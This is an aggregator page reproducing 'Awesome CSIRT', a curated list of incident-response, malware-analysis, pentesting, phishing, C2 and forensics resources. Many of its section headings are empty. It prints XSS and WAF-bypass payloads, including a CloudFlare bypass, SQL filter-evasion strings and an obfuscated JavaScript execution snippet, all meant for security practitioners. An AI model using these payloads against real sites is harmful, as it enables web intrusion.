All Projects → Spacial → Awesome Csirt

Spacial / Awesome Csirt

Licence: gpl-3.0
Awesome CSIRT is an curated list of links and resources in security and CSIRT daily activities.

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Awesome Csirt

Patrowlhears
PatrowlHears - Vulnerability Intelligence Center / Exploits
Stars: ✭ 89 (-32.58%)
Mutual labels:  threat-intelligence, cve, exploits
Freki
🐺 Malware analysis platform
Stars: ✭ 285 (+115.91%)
Mutual labels:  malware-analysis, threat-intelligence, reverse-engineering
Exploits
Exploits by 1N3 @CrowdShield @xer0dayz @XeroSecurity
Stars: ✭ 154 (+16.67%)
Mutual labels:  poc, cve, exploits
Vfeed
The Correlated CVE Vulnerability And Threat Intelligence Database API
Stars: ✭ 826 (+525.76%)
Mutual labels:  threat-intelligence, cve, exploits
exploits
Some personal exploits/pocs
Stars: ✭ 52 (-60.61%)
Mutual labels:  exploits, poc, cve
Matire
Malware Analysis, Threat Intelligence and Reverse Engineering: LABS
Stars: ✭ 55 (-58.33%)
Mutual labels:  malware-analysis, threat-intelligence, reverse-engineering
Cve 2019 0708 Tool
A social experiment
Stars: ✭ 87 (-34.09%)
Mutual labels:  poc, cve
Fundamentos Engenharia Reversa
Livro: Fundamentos de Engenharia Reversa
Stars: ✭ 93 (-29.55%)
Mutual labels:  malware-analysis, reverse-engineering
Mazewalker
Toolkit for enriching and speeding up static malware analysis
Stars: ✭ 132 (+0%)
Mutual labels:  malware-analysis, reverse-engineering
Information Security Tasks
This repository is created only for infosec professionals whom work day to day basis to equip ourself with uptodate skillset, We can daily contribute daily one hour for day to day tasks and work on problem statements daily, Please contribute by providing problem statements and solutions
Stars: ✭ 108 (-18.18%)
Mutual labels:  pentesting, malware-analysis
Vulnerability Data Archive
With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools
Stars: ✭ 63 (-52.27%)
Mutual labels:  threat-intelligence, cve
Hisilicon Dvr Telnet
PoC materials for article https://habr.com/en/post/486856/
Stars: ✭ 101 (-23.48%)
Mutual labels:  poc, exploits
Analyzer
🔍 Offline Analyzer for extracting features, artifacts and IoCs from Windows, Linux, Android, iPhone, Blackberry, macOS binaries, emails and more
Stars: ✭ 108 (-18.18%)
Mutual labels:  malware-analysis, threat-intelligence
Pentesting toolkit
🏴‍☠️ Tools for pentesting, CTFs & wargames. 🏴‍☠️
Stars: ✭ 1,268 (+860.61%)
Mutual labels:  pentesting, reverse-engineering
Malware Feed
Bringing you the best of the worst files on the Internet.
Stars: ✭ 69 (-47.73%)
Mutual labels:  malware-analysis, threat-intelligence
Exploits
Miscellaneous exploit code
Stars: ✭ 1,157 (+776.52%)
Mutual labels:  poc, exploits
Middleware Vulnerability Detection
CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15
Stars: ✭ 1,378 (+943.94%)
Mutual labels:  poc, cve
Arissploit
Arissploit Framework is a simple framework designed to master penetration testing tools. Arissploit Framework offers simple structure, basic CLI, and useful features for learning and developing penetration testing tools.
Stars: ✭ 114 (-13.64%)
Mutual labels:  pentesting, exploits
Analyst Arsenal
A toolkit for Security Researchers
Stars: ✭ 112 (-15.15%)
Mutual labels:  malware-analysis, threat-intelligence
Capa
The FLARE team's open-source tool to identify capabilities in executable files.
Stars: ✭ 1,981 (+1400.76%)
Mutual labels:  malware-analysis, reverse-engineering

CSIRT Awesome

*Please contribute through pull requests- ;)

Another great list: awesome-incident-response

Books

Links

Hashing

CVEs

  • Some CVEs stuff and links here and in here
  • MikroTik search on shodan.
  • TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
  • cve_manager: A python script that a) parses NIST NVD CVEs, b) prcoesses and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVEs database.
  • dorkbot: Command-line tool to scan Google search results for vulnerabilities.

Malware Analysis

Web Malwares

Samples

Repos

  • A repository of LIVE malwares for your own joy and pleasure: theZoo
  • malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
  • Beginner Malware Reversing Challenges, by MalwareTech. repo
  • MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect internet potencially malicious hosts
  • C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
  • LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
  • MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
  • What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles and Sources

Reverse Engineering

Decompilers

Yara

Ghidra

Frameworks

Patching

  • Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

WebServers

Credentials

Tokens

Secure Programming

Web Training

SAST

Secure Web dev

Formal Analysis

Fuzzing

API

REST

CTFs

CTFs tools

  • CTFs-Exploits
  • nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
  • thg-framework
  • Super-Guesser-ctf
  • Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.

Phreak

Archs

Hardware

ARM

Pentesting

Reconnaissance

Enumeration

  • linux-smart-enumeration: Linux enumeration tool for pentesting and CTFs with verbosity levels
  • Ethical Hacking Course: Enumeration Theory
  • Sublist3r: Fast subdomains enumeration tool for penetration testers
  • subscraper: External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps.
  • massh-enum: OpenSSH 7.x Mass Username Enumeration.
  • LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks
  • linpostexp: Linux post exploitation enumeration and exploit checking tools
  • Social Mapper - A Social Media Enumeration & Correlation Tool. github repo
  • The art of subdomain enumeration: This repository contains all the supplement material for the book "The art of sub-domain enumeration".
  • social_mapper: A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
  • LEGION - Automatic Enumeration Tool
  • discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
  • Z/OS System Enumeration Scripts: PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL.
  • WPExploitation: simples scripts to help windows enumeration.
  • CTFR does not use neither dictionary attack nor brute-force, it just abuses of Certificate Transparency logs.
  • feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
  • grinder: Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
  • Admin-Scanner: This tool is to design to find admin panel of websites.
  • Virtual host scanner: A script to enumerate virtual hosts on a server.
  • vhost-brute: A PHP tool to brute force vhost configured on a server.
  • grab_beacon_config: nmap strip to get beacon info.
  • assetfinder: Find domains and subdomains related to a given domain.
  • Wordlists:

WebShells

ShellCodes

Reporting

OSINT - Open Source INTelligence

OSINT Webscraping

  • OSINT framework focused on gathering information from free tools or resources.
  • h8mail: Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
  • PwnBin: Python Pastebin Webcrawler that returns list of public pastebins containing keywords
  • ODBParser: OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories.
  • pastego: Scrape/Parse Pastebin using GO and expression grammar (PEG)
  • Instagram Scraper: Scrapes an instagram user's photos and videos

OSINT Chats

  • chatter: internet monitoring osint telegram bot for windows
  • Slackhound: Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects.
  • ail-feeder-telegram: External telegram feeder for AIL framework.

Vulnerability

WAFs

'';!--"<XSS>=&{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  • CloudFlare XSS Bypass:
<svg
onload=alert%26%230000000040
"1")>
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

Exploits

Bug Bounty

curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Web Exploitation

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
Burp Suite

Red Team

Command & Control (C2)

Purple Team

  • Purple Cloud: An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On kiploit

DNS

Exfiltration

Payloads

Phishing

  • Phishing on Twitter
  • evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
  • shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
  • pompa: Fully-featured spear-phishing toolkit - web front-end.
  • ..Modlishka..: Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
  • Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
  • Lure: User Recon Automation for GoPhish
  • PhishingKitTracker: An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
  • SimplyTemplate: Phishing Template Generation Made Easy.

Forensics

  • Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
  • O-Saft: OWASP SSL advanced forensic tool
  • PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
  • swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
  • The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
  • Invoke-LiveResponse
  • Linux Forensics
  • CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
  • mac_apt: macOS Artifact Parsing Tool
  • MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
  • imago-forensics: Imago is a python tool that extract digital evidences from images.
  • remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
  • Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
  • libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
  • usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
  • Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
  • KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
  • AVML(Acquire Volatile Memory for Linux).
  • turbinia: Automation and Scaling of Digital Forensics Tools
  • Eric Zimmerman's Tools
  • MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
  • Kuiper: Digital Forensics Investigation Platform
  • file Signatures:
  • PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
  • OfficeForensicTools: A set of tools for collecting forensic information.

Distros

Volatility

Blue Team

Threat Hunting

MISP

APT - Advanced Persistent Threat

IoCs

SIEM

Browsers

Browsers Addons

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

Powershell

Office and O/365

macOS/iOS

Android

Linux/ *Nix

Cloud

AWS

Risk Assessment and Vulnerability Management

Guidelines

ICS (SCADA)

Radio

Satellite

Social Engineering

Tools

Note-taking

  • SwiftnessX: A cross-platform note-taking & target-tracking app for penetration testers.

Kali

  • hurl: hexadecimal & URL encoder + decoder. Package Description: hURL is a small utility that can encode and decode between multiple formats.

IP Reputation

Shell tools

  • Python-Scripts: some scripts for penetration testing.
  • SubEnum: bash script for Subdomain Enumeration
  • password-store: Simple password manager using gpg and ordinary unix directories.

Search Engines

VPN

  • jigsaw project by Alphabet/Google. Outline: VPN Server.
  • SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
  • WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
  • Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
  • Sputnik -An Open Source Intelligence Browser Extension
  • PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
  • uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
  • Nefarious LinkedIn: A look at how LinkedIn spies on its users.
  • ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.

Secure Sharing

  • CryFS: Keep your data safe in the cloud. code
  • Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
  • VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
  • CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
  • Boxcryptor: Security for your Cloud.
  • Nextcloud E2E: End-to-end encryption RFC. Some old news about it
  • DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
  • ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!

Privacy

General

Configs


Training and Certifications

Conferences and Slides


Sources

Some good places to visit:


Fun


CFPs

2018

Articles


Other Repos

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].